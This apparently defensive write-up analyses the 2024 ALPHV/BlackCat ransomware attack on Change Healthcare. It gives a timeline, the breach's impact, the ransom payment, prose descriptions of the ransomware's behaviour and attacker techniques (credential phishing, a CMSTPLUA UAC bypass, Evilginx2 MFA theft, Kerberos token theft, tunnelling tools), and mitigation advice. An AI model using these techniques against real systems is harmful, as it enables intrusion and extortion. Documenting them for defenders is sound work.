Change Healthcare was attacked by a cybercrime group affiliated with the ALPHV/BlackCat/Noberus Ransomware-as-a-Service platform in 2024. Change Healthcare provides services that enable information, claims, and payments to be exchanged between physicians, pharmacists, health plans, and governments. To put that in perspective, Change Healthcare processes one out of every three medical records in the United States. ALPHV/BlackCat are experienced and exceptionally capable cyber criminals who are expected to continue targeting the Healthcare and Public Health Sector in addition to other U.S. critical infrastructure. These threat actors are suspected to be a successor of REvil, Darkside, and BlackMatter threat groups.

Incident

On February 12, 2024, the criminals used compromised credentials to remotely access a Change Healthcare Citrix portal, which is an application used to enable remote desktop access. This application did not have multi-factor authentication. ALPHV/BlackCat deployed the ransomware nine days later on February 21, 2024. The ALPHV/BlackCat ransomware actors employ a multiple extortion model of attack: demand a ransom to decrypt files, threaten to publish stolen data on the dark web, and threaten to launch a denial-of-service attack.

On March 7, 2024, Change Healthcare was able to confirm that a substantial quantity of data had been exfiltrated from its environment between February 17, 2024, and February 20, 2024. On March 13, 2024, Change Healthcare obtained a dataset of exfiltrated files that was safe to investigate and began preliminary targeted analysis. On April 22, 2024, Change Healthcare publicly confirmed the impacted data could cover a substantial population of America.

Change Healthcare is a subsidiary of UnitedHealth Group through Optum. The CEO of UnitedHealth Group, Andrew Witty, testified before the House Energy and Commerce Committee Subcommittee on Oversight and Investigations in the “Examining the Change Healthcare Cyberattack” hearing that he made the decision to pay the random "guided by the overriding priority to do everything possible to protect peoples’ personal health information."

The breach exposed the personal information of more than 100 million people, marking it as the largest healthcare data breach in U.S. history. The compromised data included health insurance member IDs, patient diagnoses, treatment details, and Social Security numbers. In response to the attack, UnitedHealth paid a $22 million ransom.

Technical Details

ALPHV/Blackcat affiliates are known to use advanced social engineering techniques and conduct open source research on a target company in order to gain initial access. The threat actors conduct phishing operations by impersonating company IT or helpdesk personnel, using phone calls or text messages (T1598) to trick employees into revealing their login credentials and gain access to the targeted network (T1586). Affiliates of ALPHV/Blackcat often communicate their demands through TOR, Tox, email, or encrypted applications and provide instructions for restoring the encrypted files.

Characteristics:

- The first widely known ransomware written in Rust.

- The ransomware is entirely command-line driven and human-operated

- It has the ability to kill virtual machines and ESXi VMs, as well as delete ESXi snapshots to avoid recovery efforts

- It encrypts the victim's files with AES-128.

- The encrypted files are renamed with the following naming convention: RECOVER-(seven-character-alphanumeric-extension)-FILES.txt

- It includes an encrypted configuration that specifies services and processes that will be stopped, exempted directories/files/file extensions, as well as a list of stolen credentials for use within the target network

- It deletes all Volume Shadow Copies

- It performs privilege escalation through the UAC bypass (T1548) that abuses the CMSTPLUA COM interface (similar to Lockbit and Avaddon)

- It creates "remote to local" and "remote to remote" symbolic links

- It uses the [Windows Restart Manager API](https://www.crowdstrike.com/en-us/blog/windows-restart-manager-part-1/) to close processes and shut down Windows services that may keep a file open during encryption

Additionally, the ALPHV/Blackcat threat actors also are known to create a user account named "aadmin", steal kerberos tokens for domain access (T1558), and to use the Evilginx2 framework to obtain MFA credentials, login credentials, and session cookies. Once initial access is established, the legitimate remote access and tunneling tools, Plink and Ngrok.

Immediate Steps to Reduce Your Ransomware Risk

- Provide security awareness training to educate employees on recognizing phishing emails and implementing best practices

- Require multifactor authentication paired with strong password policies.

- Regularly audit assets and data to detect both approved and unauthorized devices and software

- Disable unused network ports and uninstall non-essential applications.

- Regularly apply vendor-issued security patches to hardware, applications, and APIs

- Perform regular backups and store the backups in a secure location that resides in a separate environment

- Implement endpoint security software to detect and block attacks

- Implement data leak protection (DLP) solutions to enable granular classification of data based on sensitivity and provide real-time alerts to security teams when data exfiltration occurs